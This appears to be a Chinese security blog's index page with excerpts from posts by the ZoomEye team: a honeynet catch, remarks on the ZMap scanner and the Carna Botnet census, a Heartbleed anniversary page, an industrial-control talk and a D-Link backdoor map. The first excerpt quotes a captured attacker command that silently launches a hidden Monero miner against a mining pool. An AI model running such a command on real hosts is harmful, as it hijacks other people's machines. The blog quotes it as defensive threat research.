今天凌晨,我们的蜜网系统跳出了个有趣的字符串:

zaxa2aq@protonmail.com

ProtonMail!前段时间我们的分享(推荐安全且匿名的邮箱 ProtonMail)似乎暗示着某种巧合,这不得不引起我们的兴趣。意料之内,匿名是把双刃剑,剑的另一端,“匿名之恶”会让人性丑恶发挥到极致。

以前我说过,黑暗森林法则同样适用于这个网络空间:被发现即被干掉。不好意思,这次是我们“干掉”了对方。

上面这个字符串完整内容是:

(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x &> /dev/null &)

Continue reading

ZMap确实是个伟大的工具,但离伟大的社区、伟大的产品还有挺长的路要走。ZMap现在稳定版本是:zmap-2.1.0,下一个大版本是3,作者的野心应该是很大的,但是3能否顺利出来,出来能否得到更好口碑,就真不好说了。

天坑

对于ZMap来说,最大的使用成本在于:不是谁都能像ZoomEye/Shodan那样的大工程拥有足够的硬件环境(包括机房环境),一个不小心就是被封。这是ZMap最大的坑,我们称之为天坑,这种天坑无形中也形成了足够的竞争门槛。但是这个天坑除了土豪一把也不是没办法填上,比如有的人就动了那么点洪荒之力,如“Internet Census 2012 ”工程,这个洪荒之力就是“Carna Botnet“。细节(不知道有多少人真的研读了):

http://internetcensus2012.bitbucket.org/paper.html

Continue reading

去年这个时候,ZoomEye 的第一次大战役,我带队通宵应急,隐约觉得这一定会载入史册,现在看来当时的努力是对的。昨天团队再次通宵为了把细节做得尽可能的好,这次我没带队,因为他们已经成熟了,公司的硬件设施还不错,再加上一个美女慰问师,那些后勤问题都可以很好解决了…

我们上线了心脏出血一周年专题,如下:

http://www.zoomeye.org/lab/heartbleed/2015

最后还放出的1000只「绵羊」,也许有争议,也许继续这样冷淡下去。

对了,如果你想加入 ZoomEye Team,可以简历投给我:evilcos@gmail.com,我一定可以让你感受那种心跳:)

昨天,YOCSEF 工业控制系统安全会议上,我做了“网络空间工控设备的发现与入侵”分享。

当时我说这个领域对我们来说是个新领域,真正的研究也就花了半个来月,但是突击后的效果还是明显的,因为这次是5人组成的临时 Team,其中一人是工控安全本身就很有经验的 Z-0ne 同学,另外几位来自 ZoomEye Team。

虽说有些成果,但是我感觉也才入了些门,这个领域要做好,还得继续。

Continue reading

我们在微信(网站安全中心)上发了文《ZoomEye.org关于D-Link后门的统计分析报告》

上线了D-Link后门全球分布地图:http://www.zoomeye.org/lab/dlink

此刻开始,我才觉得我们的大数据有了个踏实的落脚点了(虽然历史上好多次踏实的,但是这次的踏实意义不一样)。我在大数据与安全有很多感悟,这是那些从来没玩过这个的人无法理解的,这种感悟能促使我能推进做出更多有趣的东东。ZoomEye团队不错:)

Continue reading